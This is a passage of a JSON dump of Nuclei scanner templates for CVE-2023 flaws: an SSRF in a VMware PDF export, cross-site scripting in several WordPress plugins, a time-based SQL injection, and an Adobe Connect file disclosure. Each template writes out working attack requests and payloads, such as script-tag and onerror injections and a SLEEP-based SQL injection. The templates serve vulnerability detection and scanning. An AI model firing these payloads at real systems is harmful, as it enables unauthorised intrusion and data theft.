Content-Type: application/json;charset=UTF-8\n X-Vrni-Csrf-Token: null\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n - |\n POST /api/pdfexport HTTP/2\n Host: {{Hostname}}\n X-Vrni-Csrf-Token: {{csrf}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n Content-Disposition: form-data; name=\"{{randstr}}\"\n\n \n \n \n Test\n \n \n

    \n \n \n ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n - http\n\n - type: word\n part: header_2\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - csrfToken\":\"([a-z0-9A-Z/+=]+)\"\n internal: true\n part: body\n# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950", "hash": "e0d7b9042884f5a9eaeed325ce3a9929", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861a" }, "name": "CVE-2023-2122.yaml", "content": "id: CVE-2023-2122\n\ninfo:\n name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: Fixed in version 1.0.27\n reference:\n - https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78\n - https://wordpress.org/plugins/image-optimizer-wd/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2122\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-2122\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26189\n cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: 10web\n product: image_optimizer\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Image optimizer\")'\n condition: and\n# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950", "hash": "cd0f675d61c9dcf4b0b6007f4d155ab6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861b" }, "name": "CVE-2023-2130.yaml", "content": "id: CVE-2023-2130\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. 
Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/zitozito1/bug_report/blob/main/SQLi.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2130\n - https://vuldb.com/?ctiid.226206\n - https://vuldb.com/?id.226206\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-2130\n cwe-id: CWE-89\n epss-score: 0.01554\n epss-percentile: 0.85779\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"Supplier Name\")'\n condition: and\n# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950", 
"hash": "088eb26854300c75d0683a6e90f00f36", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861c" }, "name": "CVE-2023-2178.yaml", "content": "id: CVE-2023-2178\n\ninfo:\n name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting\n author: Farish\n severity: medium\n description: |\n The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\n - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2178\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2178\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3232\n cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: aajoda\n product: aajoda_testimonials\n framework: wordpress\n tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\")'\n - 'contains(body_2, \"page_aajoda-testimonials\")'\n condition: and\n# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950", "hash": "0bccc41564389c44c5d68b2ba4002bca", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861d" }, "name": "CVE-2023-22232.yaml", "content": "id: CVE-2023-22232\n\ninfo:\n name: Adobe Connect < 12.1.5 - Local File Disclosure\n author: 0xr2r\n severity: medium\n description: |\n Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. 
Exploitation of this issue does not require user interaction\n reference:\n - https://helpx.adobe.com/security/products/connect/apsb23-05.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-22232\n - http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2023-22232\n cwe-id: CWE-284,NVD-CWE-noinfo\n epss-score: 0.13033\n epss-percentile: 0.95385\n cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: adobe\n product: connect\n shodan-query: title:\"Adobe Connect\"\n tags: packetstorm,cve2023,cve,adobe,lfd,download\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Save to My Computer\"\n - \"exam.pdf\"\n - \"Click to Download\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950", "hash": "e60b7293d050ffa8d10159a102fdfce8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861e" }, "name": "CVE-2023-2224.yaml", "content": "id: CVE-2023-2224\n\ninfo:\n name: Seo By 10Web < 1.2.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n reference:\n - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992\n - 
https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2224\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2224\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41348\n cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: 10web\n product: seo\n framework: wordpress\n tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\n Host: {{Hostname}}\n\n task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - 'value=\"\">